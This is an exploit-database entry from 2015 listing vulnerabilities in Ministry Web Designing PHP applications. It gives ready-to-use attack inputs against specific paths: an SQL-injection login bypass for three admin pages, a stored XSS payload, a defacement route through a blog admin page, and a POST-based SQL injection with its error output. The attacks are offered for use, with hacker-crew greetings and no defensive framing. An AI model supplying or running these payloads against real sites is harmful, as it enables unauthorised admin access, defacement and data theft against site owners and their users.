Ministry Web Designing Multiple Vulnerabilities

2015-08-04T00:00:00
ID 1337DAY-ID-23953
Type zdt
Reporter r3nw4
Modified 2015-08-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: [Ministry Web Designing Multiple Vulnerabilities]
# Google Dork: [ Not for noobs :D ]
# Date: [4-8-2015]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Vendor Homepage [http://www.ministrywebdesigning.com/]
# Version: [All versions]
# Tested on: [Linux(Debian)]
# Greetz: MuhmadEmad - Razor X Blade - All Kurdish Hackers
# I didn't see any security

-----------------------

Multiple Admin Authication bypass Vulnerableties:

exploit:
user: '=' 'or'
pass: '=' 'or'

Vunlerable Sections:

/downloadcounter/admin/login.php
/mediaprogram/admin/index.php
/churchprogram/login.php

-----------------------

Multiple Stored XSS

Vunlerable Sections:

/ministryprograms/Blog/
/churchprogram/ShoppingCart/
/churchprogram/phpMonthlyCalendar/admin.php

in search field type:
"'/>><img src=x onerror=alert(/XSS_HERE/)>

------------------------

Make a Defacment:
/ministryprograms/Blog/admin.php?ac=newPost

deface goes here:
/ministryprograms/Blog/frontend/index.php?ac=post&id=1&p=1

------------------------

SQLi From POST:

/ministryprograms/Blog/frontend/index.php

with this data:
ac=list&submit=&search_str=%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR title LIKE '%'%')' at line 1

-------------------------

# Remember i born in 2000, Fuck Lammers
# https://twitter.com/R3NW4

#  0day.today [2018-03-09]  #